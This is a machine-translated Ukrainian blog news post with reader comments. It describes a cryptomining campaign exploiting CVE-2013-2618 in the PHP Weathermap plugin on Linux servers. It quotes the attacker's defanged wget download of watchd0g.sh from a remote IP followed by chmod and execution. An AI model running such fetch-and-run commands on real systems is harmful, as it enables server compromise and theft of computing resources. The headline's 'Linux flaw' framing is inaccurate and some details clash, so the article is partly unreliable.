П’ятирічний недолік Linux дозволяє зловмисникам видобувати криптовалюти

збій Linux

Це від майнер криптовалют з використанням віддалених комп’ютерів без дозволу серед власників цього стає тенденцією. Я вже кілька разів говорив про це тут, у блозі, про ситуацію такого типу.

І це те, що це вже повністю вийшло з-під контролю з моменту появи криптовалют зайняли досить значне місце та цінність, люди, які мають достатньо знань для доступу до комп’ютерів, що порушують їхню безпеку, відклали час, шукаючи важливу інформацію або банківські рахунки, щоб отримати грошову вигоду.

Замість того, щоб робити це, вони обирають найпростіше: взяти під контроль ці команди та об'єднати їх у майнінг-мережу, а також для інших завдань, які вони зазвичай виконують із бот-мережею.

Таким чином, як правило, більше перенумерувати вас, вони зосереджуються лише на миттєвих грошах, які це генерує.

Розумно розуміючи ринкові тенденції та належні знання криптоторгівлі, можна отримати великі вигоди.

Чи справді Linux є безпечною системою?

Багато з нас думають, що Linux - це майже ідеальна захищена операційна система, реальність така, що вона все ще має деякі недоліки.

Ну маєкілька днів TrendMicro зробив знахідку, в якому розкрито новий недолік систем Linux, який дав хакерам перевагу видобутку криптовалют використання серверів та машин Linux.

У заяві через ваш блог вони прокоментували наступне:

За допомогою нашого моніторингу, пов'язаного з реагуванням на інциденти, ми спостерігали спроби вторгнення, показники яких нам вдалося співвіднести з попередньою кампанією з видобутку криптовалют, яка використовувала шкідливе програмне забезпечення JenkinsMiner.

Різниця: ця кампанія націлена на сервери Linux. Це також класичний випадок повторного використання вразливостей, оскільки він використовує застарілий недолік безпеки, патч якого доступний майже п’ять років.

У цьому випуску через ваш аналіз вдалося ідентифікувати уражені сайти за цю невдачу, що В основному це вражає Японію, Тайвань, Китай, США та Індію.

Аналіз атаки

Через аналіз від Trend Micro Smart Protection Network докладно трохи розповісти про те, як зловмисники користуються цією вадою:

Оператори цієї кампанії використовували CVE-2013-2618, застарілу вразливість у плагіні Camapi Network Weathermap, яку системні адміністратори використовують для візуалізації мережевої діяльності.

Що стосується того, чому вони використовують старий недолік безпеки: На сьогодні мережевий Weathermap має лише дві уразливості, про які повідомляється публічно, обидві з червня 2014 року.

Ці зловмисники можуть скористатися не лише недоліком безпеки, для якого доступний експлойт, але й затримкою виправлення, яка виникає в організаціях, що використовують інструмент з відкритим кодом.

В основному атака здійснюється через атаку XSS:

карта погоди-криптомайнер-4

Нечіткою частиною є ціль атаки, веб-сервер з портом.

Файл /plugins/weathermap/configs/conn.php - це файл, отриманий в результаті постійної атаки XSS на / plugins / weathermap / php .

Плюс conn.php Спочатку ми бачимо подібний запит HTTP, застосований до сторінки з назвою ' охолоджує.php ».

Програма видобутку криптовалют поширюється через уразливість з карти погоди PHP на цілі, які є серверами Linux

На зображенні ви можете бачити, як генерується атака, і це описано наступним чином:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Для цього потрібно надіслати індикацію завантаження файлу за допомогою wget - утиліти, яку майже всі дистрибутиви Linux встановили за замовчуванням.

chmod 775 watchd0g.sh

робить файл виконуваним

./watchd0g.sh

Зрештою, це робить так, щоб файл запускався на сервері.

На щастя, вже є патч ( CVE-2013-2618 ) доступні для відмови і Ви можете завантажити його від це посилання.

Si ви хочете дізнатися більше про це цієї помилки ви можете відвідати це посилання.

Фуенте: Майнер криптовалют, що поширюється через уразливість PHP Weathermap, націлений на сервери Linux


5 коментарі, залиште свій

Залиште свій коментар

Ваша електронна адреса не буде опублікований. Обов'язкові для заповнення поля позначені *

*

*

  1. Відповідальний за дані: Мігель Анхель Гатон
  2. Призначення даних: Контроль спаму, управління коментарями.
  3. Легітимація: Ваша згода
  4. Передача даних: Дані не передаватимуться третім особам, за винятком юридичних зобов’язань.
  5. Зберігання даних: База даних, розміщена в мережі Occentus Networks (ЄС)
  6. Права: Ви можете будь-коли обмежити, відновити та видалити свою інформацію.

  1.   Мігель Майоль і тур - сказав він

    Бути ідіотом небезпечно, і, незважаючи на це, Linux рятує вас.
    Не оновлення виправлень безпеки не є виною Linux. Виною тому, що деякі компанії, щоб заощадити гроші, наймають ідіотів як системних адміністраторів,
    Але навіть незважаючи на це, це ВИДАЄТЬСЯ ОДРАЗУ і вирішується відразу, навіть будь-який незначний випадок безпеки, подібний до цього, публікується.

  2.   Я хочу віллу, як eldekoletas - сказав він

    І яка помилка Linux, що її оновлення не застосовуються? Розробники GNU / Linux роблять свою роботу, розробляючи рішення для нових уразливостей та роблячи їх доступними для користувачів. Якщо лікар прописує вакцину проти грипу, а ви не отримуєте її, ви захворіли і скуті ... чи це вина лікаря?

  3.   Білл - сказав він

    DesdeLinux no es lo que era, dos noticias seguidas con dos fallos importantes:
    1. - У кращих редакторах для розробки вони ставлять одне, що не є вільним програмним забезпеченням, і забувають інших, які є (про них цитується в коментарях).
    2. - Величезні новини про віруси, коли вони впливають лише на НЕ ОНОВЛЕНІ сервери. Але якщо якийсь Linux оновлюється за замовчуванням протягом десятиліть. Покласти страх так, ніби потрібен антивірус, що смокче в стилі Windows. Здається, вони намагаються сказати, що Linux - це те саме, що Windows, а ні.
    Якщо помилка стара і вже виправлена, це не є ні новиною, ні нічим. Не грайте в Microsoft та антивірусні компанії, такі як Trend Micro, Norton, Panda або McAffee, або отримуйте гроші.
    До речі, ми використовували Trend Micro протягом декількох років у компанії, і це була справжня картопля, халепа, тому що в її системі було сказано, що у виконуваному файлі є "сліди" вірусів (щось, що може бути вірусом, навіть якщо він був ні) і чому він видалив його (він переніс його в каталог, щоб він не запускався), не дозволяючи його використання, і у нього не було жодного білого списку, щоб розблокувати цю поведінку безпечним виконуваним файлом, який нам потрібно було використовувати . Іди лайно. Це була корпоративна версія, в окремій версії дійсно була можливість цього білого списку. Пафосний.

  4.   Білл - сказав він

    Не описуй себе так елегантно.
    Стаття розповідає про діру в безпеці, яка дозволяє увійти в програму, зробити її виконуваною та запустити, що є дірою в безпеці, яку повинен поширювати кожен вірус, очевидно, щоб бути вірусом, який має мати введена програма в коді можливість сканування комп'ютерів в мережі для повторення операції та самостійного копіювання. Вони не роблять цього точно, оскільки в Linux виявлені діри в системі безпеки покриваються виправленням безпеки, і саме це я маю на увазі під різницею між Windows і Linux, оскільки антивірус потрібен не лише для покриття діри. У Windows це складніше з кількох причин: 1. - Файли можуть стати виконуваними просто через їх розширення, усуваючи крок для їх введення на уражений комп'ютер. 2. - Користувачі постійно встановлюють програми сумнівного походження, тому що вони є власністю і повинні мати їх, не платячи (я нічого не кажу, що було б для домашнього господарства купувати MS Office, Photoshop, ... більше ніж подвоювати вартість комп’ютерної техніки). 3. - Рано чи пізно Windows змиється, користувач переносить його до сусіда, друга, ... який, щоб не витрачати час, все форматує та встановлює Windows ultimate за допомогою патчу активації, який не оновлюється або патч сам ставить шпигунську програму. Можливо, це не так, і це здорово, але може бути, що воно є, і Windows має шпигунство за паролями. У статті вони згадують про систему введення в Linux, на яку впливає вразливість, завдяки чому програма, яка автоматично сканує мережу та використовує її для копіювання та запуску на сервері, є найпростішою частиною всього, з цієї причини те, що було сказано в стаття є найважливішим кроком для будь-якого вірусу: знання вразливості системи до атак.

  5.   хамбагліо - сказав він

    Погана інформація. Це не помилка в Linux, це помилка в PHP APPLICATION, тобто вона є міжплатформою. Це навіть не ексклюзивно для систем, що працюють на ядрі Linux! Але навіть якби додаток не був крос-платформним, це не було б помилкою Linux, це було б просто додатком.

    Ядро Linux не має ані найменших перешкод для захисту від атак сценаріїв між сайтами, як ця. Принаймні, досліджуйте П’ЯТЬ ХВИЛИН перед публікацією, бо правда, що для кожного, хто про щось трохи знає, ви будете виглядати погано.